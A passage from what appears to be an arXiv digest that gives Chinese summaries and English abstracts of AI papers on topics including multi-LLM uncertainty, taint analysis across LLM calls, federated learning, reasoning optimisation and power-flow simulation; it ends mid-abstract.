【速读】:该论文旨在解决多大语言模型(Large Language Model, LLM)系统中不确定性估计的局限性问题,即现有方法主要关注单个模型内部的不确定性,而未能有效捕捉不同模型之间的语义分歧。其解决方案的关键在于提出一种名为协同熵(Collaborative Entropy, CoE)的统一信息论度量指标,该指标定义在共享的语义聚类空间上,融合了模型内语义熵(intra-model semantic entropy)与模型间对集成均值的差异性(inter-model divergence),从而实现对多LLM协作过程中系统级不确定性(system-level uncertainty)的量化,特别强调协作置信度与模型间分歧的刻画。
链接: https://arxiv.org/abs/2603.28360
作者: Kangkang Sun,Jun Wu,Jianhua Li,Minyi Guo,Xiuzhen Che,Jianwei Huang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 18 pages, 7 figures, has already published in ICLR workshop “Agentic AI in the Wild: From Hallucinations to Reliable Autonomy”
Abstract:Uncertainty estimation in multi-LLM systems remains largely single-model-centric: existing methods quantify uncertainty within each model but do not adequately capture semantic disagreement across models. To address this gap, we propose Collaborative Entropy (CoE), a unified information-theoretic metric for semantic uncertainty in multi-LLM collaboration. CoE is defined on a shared semantic cluster space and combines two components: intra-model semantic entropy and inter-model divergence to the ensemble mean. CoE is not a weighted ensemble predictor; it is a system-level uncertainty measure that characterizes collaborative confidence and disagreement. We analyze several core properties of CoE, including non-negativity, zero-value certainty under perfect semantic consensus, and the behavior of CoE when individual models collapse to delta distributions. These results clarify when reducing per-model uncertainty is sufficient and when residual inter-model disagreement remains. We also present a simple CoE-guided, training-free post-hoc coordination heuristic as a practical application of the metric. Experiments on \textitTriviaQA and \textitSQuAD with LLaMA-3.1-8B-Instruct, Qwen-2.5-7B-Instruct, and Mistral-7B-Instruct show that CoE provides stronger uncertainty estimation than standard entropy- and divergence-based baselines, with gains becoming larger as additional heterogeneous models are introduced. Overall, CoE offers a useful uncertainty-aware perspective on multi-LLM collaboration.
[AI-31] Crossing the NL/PL Divide: Information Flow Analysis Across the NL/PL Boundary in LLM -Integrated Code
【速读】:该论文旨在解决大语言模型(Large Language Model, LLM)API调用在程序分析中引入的“自然语言/编程语言(NL/PL)边界”问题,即现有程序分析技术(如污点传播、依赖分析、代码切片等)无法跨过LLM调用边界追踪数据流,因为输入到LLM的运行时值经由自然语言提示后,在模型内部进行黑盒处理,并以代码、SQL、JSON或文本等形式输出,导致传统基于数据流摘要的分析失效。解决方案的关键在于提出首个信息流方法来跨越该边界:基于定量信息流理论构建了一个包含24个标签的分类体系,沿“信息保留程度”(从词法保留到完全阻断)和“输出模态”(自然语言、结构化格式、可执行产物)两个正交维度对LLM输出行为进行标注;通过标注9,083个占位符-输出对验证其可靠性和覆盖率,并进一步在污点传播和反向切片两个下游任务中证明该分类体系的有效性——实现了F₁=0.923的精确率与召回率,并显著减少无传播占位符引起的冗余切片。
链接: https://arxiv.org/abs/2603.28345
作者: Zihao Xu,Xiao Cheng,Ruijie Meng,Yuekang Li
机构: 未知
类目: oftware Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注:
Abstract:LLM API calls are becoming a ubiquitous program construct, yet they create a boundary that no existing program analysis can cross: runtime values enter a natural-language prompt, undergo opaque processing inside the LLM, and re-emerge as code, SQL, JSON, or text that the program consumes. Every analysis that tracks data across function boundaries, including taint analysis, program slicing, dependency analysis, and change-impact analysis, relies on dataflow summaries of callee behavior. LLM calls have no such summaries, breaking all of these analyses at what we call the NL/PL boundary. We present the first information flow method to bridge this boundary. Grounded in quantitative information flow theory, our taxonomy defines 24 labels along two orthogonal dimensions: information preservation level (from lexically preserved to fully blocked) and output modality (natural language, structured format, executable artifact). We label 9,083 placeholder-output pairs from 4,154 real-world Python files and validate reliability with Cohen’s \kappa = 0.82 and near-complete coverage (0.01% unclassifiable). We demonstrate the taxonomy’s utility on two downstream applications: (1)~a two-stage taint propagation pipeline combining taxonomy-based filtering with LLM verification achieves F_1 = 0.923 on 353 expert-annotated pairs, with cross-language validation on six real-world OpenClaw prompt injection cases further confirming effectiveness; (2)~taxonomy-informed backward slicing reduces slice size by a mean of 15% in files containing non-propagating placeholders. Per-label analysis reveals that four blocked labels account for nearly all non-propagating cases, providing actionable filtering criteria for tool builders. Subjects: Software Engineering (cs.SE); Artificial Intelligence (cs.AI) Cite as: arXiv:2603.28345 [cs.SE] (or arXiv:2603.28345v1 [cs.SE] for this version) https://doi.org/10.48550/arXiv.2603.28345 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-32] A Multi-Agent Rhizomatic Pipeline for Non-Linear Literature Analysis
【速读】:该论文旨在解决社会科学研究中系统性文献综述普遍依赖树状逻辑(arborescent logics)所带来的局限性,即通过层级关键词筛选、线性筛选和分类法难以捕捉复杂研究领域中的横向关联、断裂点与涌现模式。其解决方案的关键在于构建一个基于德勒兹过程关系本体论的多智能体计算管道——Rhizomatic Research Agent (V3),该系统通过12个专业化代理在七阶段架构中协同运作,将“根茎”(rhizome)的六个核心原则——连接、异质性、多元性、无意义断裂、制图学和拓印——转化为自动化流程,整合大语言模型(LLM)编排、OpenAlex与arXiv双源语料摄入、SciBERT语义地形分析及动态断裂检测协议,从而实现非线性知识映射,有效识别跨学科交汇点与传统方法忽略的结构性研究空白。
链接: https://arxiv.org/abs/2603.28336
作者: Julio C. Serrano. Joonas Kevari,Rumy Narayan
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Research note paper, 12 pages, 1 figure, 2 tables
Abstract:Systematic literature reviews in the social sciences overwhelmingly follow arborescent logics – hierarchical keyword filtering, linear screening, and taxonomic classification – that suppress the lateral connections, ruptures, and emergent patterns characteristic of complex research landscapes. This research note presents the Rhizomatic Research Agent (V3), a multi-agent computational pipeline grounded in Deleuzian process-relational ontology, designed to conduct non-linear literature analysis through 12 specialized agents operating across a seven-phase architecture. The system was developed in response to the methodological groundwork established by (Narayan2023), who employed rhizomatic inquiry in her doctoral research on sustainable energy transitions but relied on manual, researcher-driven exploration. The Rhizomatic Research Agent operationalizes the six principles of the rhizome – connection, heterogeneity, multiplicity, asignifying rupture, cartography, and decalcomania – into an automated pipeline integrating large language model (LLM) orchestration, dual-source corpus ingestion from OpenAlex and arXiv, SciBERT semantic topography, and dynamic rupture detection protocols. Preliminary deployment demonstrates the system’s capacity to surface cross-disciplinary convergences and structural research gaps that conventional review methods systematically overlook. The pipeline is open-source and extensible to any phenomenon zone where non-linear knowledge mapping is required.
[AI-33] Building evidence-based knowledge graphs from full-text literature for disease-specific biomedical reasoning
【速读】:该论文旨在解决生物医学知识资源中证据信息表达不充分的问题,即现有资源要么以非结构化文本形式保存证据,要么将其压缩为扁平三元组而丢失研究设计、溯源信息和定量支持。解决方案的关键在于提出EvidenceNet框架及其配套数据集,通过大语言模型(Large Language Model, LLM)辅助的流水线,从全文文献中提取实验依据明确的结构化证据节点,对生物医学实体进行标准化、评估证据质量,并通过类型化的语义关系连接证据记录,从而构建疾病特异性的知识图谱。该方法在技术验证中展现出高精度的字段级抽取(98.3%)、实体链接准确率(100.0%)及语义关系分类准确率(90.0%),并显著提升检索增强型问答性能,保留可用于未来链接预测与靶点优先排序的结构信号。
链接: https://arxiv.org/abs/2603.28325
作者: Chang Zong,Sicheng Lv,Si-tu Xue,Huilin Zheng,Jian Wan,Lei Zhang
机构: 未知
类目: Computational Engineering, Finance, and Science (cs.CE); Artificial Intelligence (cs.AI)
备注: 30 pages, 5 figures, 12 tables
Abstract:Biomedical knowledge resources often either preserve evidence as unstructured text or compress it into flat triples that omit study design, provenance, and quantitative support. Here we present EvidenceNet, a framework and dataset for building disease-specific knowledge graphs from full-text biomedical literature. EvidenceNet uses a large language model (LLM)-assisted pipeline to extract experimentally grounded findings as structured evidence nodes, normalize biomedical entities, score evidence quality, and connect evidence records through typed semantic relations. We release two resources: EvidenceNet-HCC with 7,872 evidence records, 10,328 graph nodes, and 49,756 edges, and EvidenceNet-CRC with 6,622 records, 8,795 nodes, and 39,361 edges. Technical validation shows high component fidelity, including 98.3% field-level extraction accuracy, 100.0% high-confidence entity-link accuracy, 87.5% fusion integrity, and 90.0% semantic relation-type accuracy. In downstream evaluation, EvidenceNet improves internal and external retrieval-augmented question answering and retains structural signal for future link prediction and target prioritization. These results establish EvidenceNet as a disease-specific resource for evidence-aware biomedical reasoning and hypothesis generation.
[AI-34] Mapping data literacy trajectories in K-12 education
【速读】:该论文旨在解决K-12教育中数据素养(data literacy)培养的系统性问题,尤其关注学习者如何从传统规则驱动编程向数据驱动系统理解转变的挑战。其核心解决方案是提出一个“数据范式框架”(data paradigms framework),该框架基于两个维度对学习活动进行分类:逻辑类型(知识驱动或数据驱动系统)与可解释性(透明或黑箱模型)。在此基础上,进一步引入“学习轨迹”(learning trajectories)概念,可视化学习者在不同数据范式间的迁移路径,并识别出四种典型的学习路径,为教育设计者提供理论依据,以优化跨学科、跨情境的数据素养教学环境构建。
链接: https://arxiv.org/abs/2603.28317
作者: Robert Whyte,Manni Cheung,Katharine Childs,Jane Waite,Sue Sentance
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注: Presented at the Data Literacy for the 21st Century: Perspectives from Visualization, Cognitive Science, Artificial Intelligence, and Education CHI '26 workshop
Abstract:Data literacy skills are fundamental in computer science education. However, understanding how data-driven systems work represents a paradigm shift from traditional rule-based programming. We conducted a systematic literature review of 84 studies to understand K-12 learners’ engagement with data across disciplines and contexts. We propose the data paradigms framework that categorises learning activities along two dimensions: (i) logic (knowledge-based or data-driven systems), and (ii) explainability (transparent or opaque models). We further apply the notion of learning trajectories to visualize the pathways learners follow across these distinct paradigms. We detail four distinct trajectories as a provocation for researchers and educators to reflect on how the notion of data literacy varies depending on the learning context. We suggest these trajectories could be useful to those concerned with the design of data literacy learning environments within and beyond CS education.
[AI-35] NeiGAD: Augmenting Graph Anomaly Detection via Spectral Neighbor Information
【速读】:该论文旨在解决图异常检测(Graph Anomaly Detection, GAD)中邻居信息建模不足的问题,即现有基于图神经网络(GNN)的方法虽通过消息传递机制利用邻居信息,但未能显式刻画邻居结构连通性与属性一致性之间的交互作用,从而限制了检测性能。其解决方案的关键在于提出一种名为NeiGAD的可插拔模块,该模块基于谱图分析(spectral graph analysis)提取邻接矩阵的特征向量,理论证明这些特征向量能够编码局部邻居交互并逐步放大异常信号;进而通过选择一组紧凑的特征向量构建高效且判别性强的表示,实现对异常节点或结构的精准识别。
链接: https://arxiv.org/abs/2603.28300
作者: Qing Qing,Huafei Huang,Mingliang Hou,Renqiang Luo,Mohsen Guizani
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 6 pages, IWCMC 2026 accepted
Abstract:Graph anomaly detection (GAD) aims to identify irregular nodes or structures in attributed graphs. Neighbor information, which reflects both structural connectivity and attribute consistency with surrounding nodes, is essential for distinguishing anomalies from normal patterns. Although recent graph neural network (GNN)-based methods incorporate such information through message passing, they often fail to explicitly model its effect or interaction with attributes, limiting detection performance. This work introduces NeiGAD, a novel plug-and-play module that captures neighbor information through spectral graph analysis. Theoretical insights demonstrate that eigenvectors of the adjacency matrix encode local neighbor interactions and progressively amplify anomaly signals. Based on this, NeiGAD selects a compact set of eigenvectors to construct efficient and discriminative representations. Experiments on eight real-world datasets show that NeiGAD consistently improves detection accuracy and outperforms state-of-the-art GAD methods. These results demonstrate the importance of explicit neighbor modeling and the effectiveness of spectral analysis in anomaly detection. Code is available at: this https URL.
[AI-36] Evaluating LLM s for Answering Student Questions in Introductory Programming Courses
【速读】:该论文旨在解决生成式 AI(Generative AI)在编程教育中应用时面临的双重挑战:一方面,学生直接使用生成式 AI 工具获取完整代码解答,削弱了学习过程中的认知建构;另一方面,教师难以高效提供及时且个性化的反馈,导致教学 scalability 问题。解决方案的关键在于构建一个任务无关的、可复现的评估框架,通过采集来自真实学习管理系统中的 170 条学生提问及其专家标注的参考答案,开发并验证了一个基于 LLM-as-a-Judge 的定制化评分指标,以量化评估 LLM 输出的教学准确性。研究发现,如 Gemini 3 flash 等模型可超越典型教师回答的质量基准,但为防止幻觉和确保课程上下文一致性,必须采用“教师在环”(teacher-in-the-loop)机制进行干预与校准,从而推动教育类大语言模型从后置测试向前置量化验证的范式转变。
链接: https://arxiv.org/abs/2603.28295
作者: Thomas Van Mullem,Bart Mesuere,Peter Dawyndt
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:The rapid emergence of Large Language Models (LLMs) presents both opportunities and challenges for programming education. While students increasingly use generative AI tools, direct access often hinders the learning process by providing complete solutions rather than pedagogical hints. Concurrently, educators face significant workload and scalability challenges when providing timely, personalized feedback. This study investigates the capabilities of LLMs to safely and effectively assist educators in answering student questions within a CS1 programming course. To achieve this, we established a rigorous, reproducible evaluation process by curating a benchmark dataset of 170 authentic student questions from a learning management system, paired with ground-truth responses authored by subject matter experts. Because traditional text-matching metrics are insufficient for evaluating open-ended educational responses, we developed and validated a custom LLM-as-a-Judge metric optimized for assessing pedagogical accuracy. Our findings demonstrate that models, such as Gemini 3 flash, can surpass the quality baseline of typical educator responses, achieving high alignment with expert pedagogical standards. To mitigate persistent risks like hallucination and ensure alignment with course-specific context, we advocate for a “teacher-in-the-loop” implementation. Finally, we abstract our methodology into a task-agnostic evaluation framework, advocating for a shift in the development of educational LLM tools from ad-hoc, post-deployment testing to a quantifiable, pre-deployment validation process.
[AI-37] FI-KAN: Fractal Interpolation Kolmogorov-Arnold Networks
【速读】:该论文旨在解决Kolmogorov-Arnold Networks (KAN) 在非光滑函数逼近中缺乏内在多尺度分解的问题,从而限制了其在不同正则性(regularity)目标上的表达能力。解决方案的关键在于引入分形插值KAN(Fractal Interpolation KAN, FI-KAN),通过将迭代函数系统(Iterated Function System, IFS)理论中的可学习分形插值函数(Fractal Interpolation Function, FIF)基函数嵌入到KAN架构中,实现对目标函数正则性的自适应匹配:Pure FI-KAN完全替代B-spline基,Hybrid FI-KAN保留B-spline路径并添加可学习的分形修正项;同时,IFS收缩参数赋予每条边可微分的分形维数,在训练过程中动态调整以适应目标的局部正则性。实验表明,该方法在Holder正则性基准、分形目标及非光滑偏微分方程解上均显著优于传统KAN,且分形维数正则化器提供了可解释的复杂度控制机制,验证了“基函数几何结构需与目标正则性相匹配”的原则。
链接: https://arxiv.org/abs/2603.28288
作者: Gnankan Landry Regis N’guessan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Numerical Analysis (math.NA)
备注: 37 pages, 20 figures, 14 tables. Code available at: this https URL
Abstract:Kolmogorov-Arnold Networks (KAN) employ B-spline bases on a fixed grid, providing no intrinsic multi-scale decomposition for non-smooth function approximation. We introduce Fractal Interpolation KAN (FI-KAN), which incorporates learnable fractal interpolation function (FIF) bases from iterated function system (IFS) theory into KAN. Two variants are presented: Pure FI-KAN (Barnsley, 1986) replaces B-splines entirely with FIF bases; Hybrid FI-KAN (Navascues, 2005) retains the B-spline path and adds a learnable fractal correction. The IFS contraction parameters give each edge a differentiable fractal dimension that adapts to target regularity during training. On a Holder regularity benchmark ( \alpha \in [0.2, 2.0] ), Hybrid FI-KAN outperforms KAN at every regularity level (1.3x to 33x). On fractal targets, FI-KAN achieves up to 6.3x MSE reduction over KAN, maintaining 4.7x advantage at 5 dB SNR. On non-smooth PDE solutions (scikit-fem), Hybrid FI-KAN achieves up to 79x improvement on rough-coefficient diffusion and 3.5x on L-shaped domain corner singularities. Pure FI-KAN’s complementary behavior, dominating on rough targets while underperforming on smooth ones, provides controlled evidence that basis geometry must match target regularity. A fractal dimension regularizer provides interpretable complexity control whose learned values recover the true fractal dimension of each target. These results establish regularity-matched basis design as a principled strategy for neural function approximation.
[AI-38] Pre-Deployment Complexity Estimation for Federated Perception Systems
【速读】:该论文旨在解决边缘人工智能(Edge AI)系统中联邦学习(Federated Learning, FL)任务在部署前难以评估其学习复杂度的问题,具体表现为缺乏工具预测在隐私保护、资源受限环境下可达到的模型准确率与通信成本。解决方案的关键在于提出一个分类器无关的预部署框架,通过联合建模数据内在属性(如维度、稀疏性和异质性)与参与客户端的组成特征,构建一个综合的学习复杂度指标。该指标能够有效反映不同联邦配置下模型训练难度,并在MNIST和CIFAR数据集上的实验验证了其与联邦学习性能及达成固定准确率所需通信开销的高度相关性,从而为边缘感知系统的资源规划、数据评估和可行性分析提供实用诊断依据。
链接: https://arxiv.org/abs/2603.28282
作者: KMA Solaiman,Shafkat Islam,Ruy de Oliveira,Bharat Bhargava
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Distributed, Parallel, and Cluster Computing (cs.DC)
备注: Accepted and presented at Edge AI Research Symposium 2026 (EdgeAI2026), San Diego, CA
Abstract:Edge AI systems increasingly rely on federated learning to train perception models in distributed, privacy-preserving, and resource-constrained environments. Yet, before training begins, practitioners often lack practical tools to estimate how difficult a federated learning task will be in terms of achievable accuracy and communication cost. This paper presents a classifier-agnostic, pre-deployment framework for estimating learning complexity in federated perception systems by jointly modeling intrinsic properties of the data and characteristics of the distributed environment. The proposed complexity metric integrates dataset attributes such as dimensionality, sparsity, and heterogeneity with factors related to the composition of participating clients. Using federated learning as a representative distributed training setting, we examine how learning difficulty varies across different federated configurations. Experiments on multiple variants of the MNIST dataset and CIFAR dataset show that the proposed metric strongly correlates with federated learning performance and the communication effort required to reach fixed accuracy targets. These findings suggest that complexity estimation can serve as a practical diagnostic tool for resource planning, dataset assessment, and feasibility evaluation in edge-deployed perception systems.
[AI-39] MR-ImagenT ime: Multi-Resolution Time Series Generation through Dual Image Representations
【速读】:该论文旨在解决时间序列预测中模型对固定长度输入的依赖性以及多尺度建模能力不足的问题。其解决方案的关键在于提出MR-CDM框架,该框架融合了分层多分辨率趋势分解(hierarchical multi-resolution trend decomposition)、适用于变长输入的自适应嵌入机制(adaptive embedding mechanism)以及多尺度条件扩散过程(multi-scale conditional diffusion process),从而实现更灵活且精准的多尺度时间序列建模与预测。
链接: https://arxiv.org/abs/2603.28253
作者: Xianyong Xu,Yuanjun Zuo,Zhihong Huang,Yihan Qin,Haoxian Xu,Leilei Du,Haotian Wang
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Time series forecasting is vital across many domains, yet existing models struggle with fixed-length inputs and inadequate multi-scale modeling. We propose MR-CDM, a framework combining hierarchical multi-resolution trend decomposition, an adaptive embedding mechanism for variable-length inputs, and a multi-scale conditional diffusion process. Evaluations on four real-world datasets demonstrate that MR-CDM significantly outperforms state-of-the-art baselines (e.g., CSDI, Informer), reducing MAE and RMSE by approximately 6-10 to a certain degree.
[AI-40] Reasoning as Energy Minimization over Structured Latent Trajectories
【速读】:该论文旨在解决传统单次神经解码器(single-shot neural decoders)缺乏迭代优化能力,而链式思维(chain-of-thought)方法虽具离散中间步骤却无标量推理进度度量的问题。其核心解决方案是提出基于能量的结构化潜空间规划(Energy-Based Reasoning via Structured Latent Planning, EBRM),将推理建模为在学习到的能量函数 $ E(h_x, z) $ 下对多步潜变量轨迹 $ z_{1:T} $ 进行梯度优化的过程。关键创新在于:能量函数分解为每步兼容性、转移一致性与轨迹平滑性三项,并通过监督编码器-解码器训练结合硬负样本对比能量塑造进行训练;推理阶段则沿潜空间执行梯度下降或Langevin动力学,最终从 $ z_T $ 解码结果。实验揭示了一个关键失败模式——潜空间规划导致CNF逻辑任务准确率由约95%降至约56%,源于训练时使用编码器输出 $ h_x $ 而评估时使用漂移至未见潜域的 $ z_T $ 所致的分布偏移,为此进一步提出双路径解码训练和潜锚定策略以缓解此问题。
链接: https://arxiv.org/abs/2603.28248
作者: David K. Johansson
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 7 pages
Abstract:Single-shot neural decoders commit to answers without iterative refinement, while chain-of-thought methods introduce discrete intermediate steps but lack a scalar measure of reasoning progress. We propose Energy-Based Reasoning via Structured Latent Planning (EBRM), which models reasoning as gradient-based optimization of a multi-step latent trajectory z_1:T under a learned energy function E(h_x, z) . The energy decomposes into per-step compatibility, transition consistency, and trajectory smoothness terms. Training combines supervised encoder-decoder learning with contrastive energy shaping using hard negatives, while inference performs gradient descent or Langevin dynamics over z and decodes from z_T . We identify a critical failure mode: on CNF logic satisfaction, latent planning reduces accuracy from \approx 95% to \approx 56% . This degradation arises from a distribution mismatch, where the decoder is trained on encoder outputs h_x but evaluated on planner outputs z_T that drift into unseen latent regions. We analyze this behavior through per-step decoding, latent drift tracking, and gradient decomposition. To address it, we propose dual-path decoder training and latent anchoring. We further introduce a six-part ablation protocol covering component contributions, trajectory length, planner dynamics, initialization, decoder training distribution, and anchor weight. Experiments on three synthetic tasks show that energy decreases monotonically and induces structured latent trajectories on graph and logic tasks, while remaining flat on arithmetic ( r = 0.073 ), indicating a negative result. Code is available at this https URL. Comments: 7 pages Subjects: Artificial Intelligence (cs.AI) Cite as: arXiv:2603.28248 [cs.AI] (or arXiv:2603.28248v1 [cs.AI] for this version) https://doi.org/10.48550/arXiv.2603.28248 Focus to learn more arXiv-issued DOI via DataCite (pending registration)
[AI-41] An Optimal Battery-Free Approach for Emission Reduction by Storing Solar Surplus in Building Thermal Mass
【速读】:该论文旨在解决建筑脱碳过程中因依赖传统需求侧管理或电池储能所引发的碳排放忽视、电网过载及环境与成本问题。其解决方案的关键在于提出一种基于热质量(thermal mass)的碳感知优化控制策略,通过在舒适温度范围内动态调节室内设定温度来存储多余可再生能源,从而实现碳排放敏感型负荷转移,避免使用专用电池储能装置。该方法结合建筑能耗、太阳能发电和实时电网碳强度预测,在保障舒适度的同时显著降低电网电力消耗。
链接: https://arxiv.org/abs/2603.28217
作者: Michela Boffi,Jessica Leoni,Fabrizio Leonforte,Mara Tanelli,Paolo Oliaro
机构: 未知
类目: ystems and Control (eess.SY); Artificial Intelligence (cs.AI)
备注:
Abstract:Decarbonization in buildings calls for advanced control strategies that coordinate on-site renewables, grid electricity, and thermal demand. Literature approaches typically rely on demand side management strategies or on active energy storage, like batteries. However, the first solution often neglects carbon-aware objectives, and could lead to grid overload issues, while batteries entail environmental, end-of-life, and cost concerns. To overcome these limitations, we propose an optimal, carbon-aware optimization strategy that exploits the building’s thermal mass as a passive storage, avoiding dedicated batteries. Specifically, when a surplus of renewable energy is available, our strategy computes the optimal share of surplus to store by temporarily adjusting the indoor temperature setpoint within comfort bounds. Thus, by explicitly accounting for forecasts of building energy consumption, solar production, and time-varying grid carbon intensity, our strategy enables emissions-aware load shifting while maintaining comfort. We evaluate the approach by simulating three TRNSYS models of the same system with different thermal mass. In all cases, the results show consistent reductions in grid electricity consumption with respect to a baseline that does not leverage surplus renewable generation. These findings highlight the potential of thermal-mass-based control for building decarbonization.
[AI-42] ERPO: Token-Level Entropy-Regulated Policy Optimization for Large Reasoning Models
【速读】:该论文旨在解决标准Group Relative Policy Optimization (GRPO)在生成式AI(Generative AI)推理过程中因粗粒度优势分配导致的熵坍缩问题,即模型倾向于生成冗余且低质量的推理路径。其核心解决方案是提出Entropy-Regulated Policy Optimization (ERPO),关键在于将优化焦点从粗粒度序列层面转移到细粒度token动态层面:通过引入熵感知门控机制增强关键决策点(Critical Decision Pivots, CDPs)处的探索能力,利用基于桶的隐式归一化缓解难度偏差,并采用结果锚定的优势合成策略重构token级信号,从而显著提升推理准确率与路径简洁性。
链接: https://arxiv.org/abs/2603.28204
作者: Song Yu,Li Li
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 13 pages, 4 figures
Abstract:Reinforcement learning from verifiable rewards (RLVR) has significantly advanced the reasoning capabilities of large language models. However, standard Group Relative Policy Optimization (GRPO) typically assigns a uniform, sequence-level advantage to all tokens, thereby overlooking the intrinsic information heterogeneity along reasoning chains. We show that this coarse-grained credit assignment leads to premature entropy collapse and encourages the model to generate redundant, low-quality reasoning paths. Through systematic empirical analysis, we identify Critical Decision Pivots (CDPs): transient high-entropy states where the policy’s trajectory is most sensitive to perturbations. These pivots represent the “forks in the road” where effective multi-path exploration is most crucial yet often suppressed by uniform advantage signals. Building on these insights, we propose Entropy-Regulated Policy Optimization (ERPO), which transitions the optimization focus from coarse sequences to fine-grained token dynamics. ERPO introduces three synergistic components: (i) Entropy-aware Gating, which adaptively amplifies exploration at CDPs to facilitate diverse path discovery; (ii) Bucket-based Implicit Normalization, which mitigates difficulty bias by aligning token progress windows; and (iii) Result-anchored Advantage Synthesis, which re-weights token-level signals via outcome-driven anchors. Extensive experiments on competitive mathematical benchmarks (e.g., MATH, AIME) demonstrate that ERPO significantly outperforms GRPO. Notably, ERPO not only boosts reasoning accuracy but also yields significantly more concise and robust derivation paths, establishing a new efficiency-accuracy frontier for large reasoning models.
[AI-43] Differentiable Power-Flow Optimization
【速读】:该论文旨在解决传统交流功率潮流(AC power-flow)仿真在应对可再生能源高波动性带来的电网管理复杂性时所面临的计算可扩展性不足问题,尤其是在联合输电-配电建模和全球电网分析等新兴应用场景中,基于牛顿-拉夫森(Newton-Raphson, NR)方法的传统仿真难以高效处理大规模问题。同时,纯数据驱动的代理模型缺乏物理约束保障,可能违反基本电力系统规律。解决方案的关键在于提出一种可微分功率潮流(Differentiable Power-Flow, DPF)框架,将AC功率潮流问题重新表述为一个可微分模拟过程,从而实现从物理功率失配到底层仿真参数的端到端梯度传播,使得参数识别可通过梯度优化高效完成。DPF利用现代机器学习框架(如PyTorch)中的GPU加速、稀疏张量表示和批处理能力,在保证物理一致性的同时显著提升计算效率,适用于时间序列分析、N-1故障分析及快速筛选等多种场景。
链接: https://arxiv.org/abs/2603.28203
作者: Muhammed Öz,Jasmin Hörter,Kaleb Phipps,Charlotte Debus,Achim Streit,Markus Götz
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:With the rise of renewable energy sources and their high variability in generation, the management of power grids becomes increasingly complex and computationally demanding. Conventional AC-power-flow simulations, which use the Newton-Raphson (NR) method, suffer from poor scalability, making them impractical for emerging use cases such as joint transmission-distribution modeling and global grid analysis. At the same time, purely data-driven surrogate models lack physical guarantees and may violate fundamental constraints. In this work, we propose Differentiable Power-Flow (DPF), a reformulation of the AC power-flow problem as a differentiable simulation. DPF enables end-to-end gradient propagation from the physical power mismatches to the underlying simulation parameters, thereby allowing these parameters to be identified efficiently using gradient-based optimization. We demonstrate that DPF provides a scalable alternative to NR by leveraging GPU acceleration, sparse tensor representations, and batching capabilities available in modern machine-learning frameworks such as PyTorch. DPF is especially suited as a tool for time-series analyses due to its efficient reuse of previous solutions, for N-1 contingency-analyses due to its ability to process cases in batches, and as a screening tool by leveraging its speed and early stopping capability. The code is available in the authors’ code repository.
[AI-44] EpiPersona: Persona Projection and Episode Coupling for Pluralistic Preference Modeling
【速读】:该论文旨在解决大语言模型(Large Language Models, LLMs)在适应个体及少数群体多样化偏好时,因现有方法将稳定个人特质与情境特定因素混合而导致泛化能力受限的问题。解决方案的关键在于提出EpiPersona框架,通过显式地将人格特征(persona)与当前情景(episode)进行耦合:首先将噪声偏好反馈投影到低维人格空间,并聚类生成离散编码以分离持久性个性特征与情境信号;随后将推断出的人格表示与当前episode关联,实现情境感知的偏好预测,从而在稀疏数据和困难的情景迁移场景中均表现出显著性能提升。
链接: https://arxiv.org/abs/2603.28197
作者: Yujie Zhang,Weikang Yuan,Zhuoren Jiang,Pengwei Yan
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Pluralistic alignment is essential for adapting large language models (LLMs) to the diverse preferences of individuals and minority groups. However, existing approaches often mix stable personal traits with episode-specific factors, limiting their ability to generalize across episodes. To address this challenge, we introduce EpiPersona, a framework for explicit persona-episode coupling. EpiPersona first projects noisy preference feedback into a low-dimensional persona space, where similar personas are aggregated into shared discrete codes. This process separates enduring personal characteristics from situational signals without relying on predefined preference dimensions. The inferred persona representation is then coupled with the current episode, enabling episode-aware preference prediction. Extensive experiments show that EpiPersona consistently outperforms the baselines. It achieves notable performance gains in hard episodic-shift scenarios, while remaining effective with sparse preference data.
[AI-45] PReD: An LLM -based Foundation Multimodal Model for Electromagnetic Perception Recognition and Decision
【速读】:该论文旨在解决电磁(EM)领域中生成式AI模型面临的两大核心挑战:一是高质量标注数据稀缺,二是领域知识与多模态理解能力的融合不足。为应对这些问题,作者提出首个面向EM领域的基础模型PReD,其关键在于构建了一个涵盖多视角表示(如时域波形、频域谱图和星座图)的高质量多任务数据集PReD-1.3M及对应的评估基准PReD-Bench,并采用多阶段训练策略统一多个EM信号处理任务,实现从端到端信号感知到语言驱动推理与决策的闭环优化,从而显著提升模型在EM领域的专业能力并保持通用多模态性能。
链接: https://arxiv.org/abs/2603.28183
作者: Zehua Han,Jing Xiao,Yiqi Duan,Mengyu Xiang,Yuheng Ji,Xiaolong Zheng,Chenghanyu Zhang,Zhendong She,Junyu Shen,Dingwei Tan,Shichu Sun,Zhou Cong,Mingxuan Liu,Fengxiang Wang,Jinping Sun,Yangang Sun
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:Multimodal Large Language Models have demonstrated powerful cross-modal understanding and reasoning capabilities in general domains. However, in the electromagnetic (EM) domain, they still face challenges such as data scarcity and insufficient integration of domain knowledge. This paper proposes PReD, the first foundation model for the EM domain that covers the intelligent closed-loop of “perception, recognition, decision-making.” We constructed a high-quality multitask EM dataset, PReD-1.3M, and an evaluation benchmark, PReD-Bench. The dataset encompasses multi-perspective representations such as raw time-domain waveform, frequency-domain spectrograms, and constellation diagrams, covering typical features of communication and radar signals. It supports a range of core tasks, including signal detection, modulation recognition, parameter estimation, protocol recognition, radio frequency fingerprint recognition, and anti-jamming decision-making. PReD adopts a multi-stage training strategy that unifies multiple tasks for EM signals. It achieves closed-loop optimization from end-to-end signal understanding to language-driven reasoning and decision-making, significantly enhancing EM domain expertise while maintaining general multimodal capabilities. Experimental results show that PReD achieves state-of-the-art performance on PReD-Bench constructed from both open-source and self-collected signal 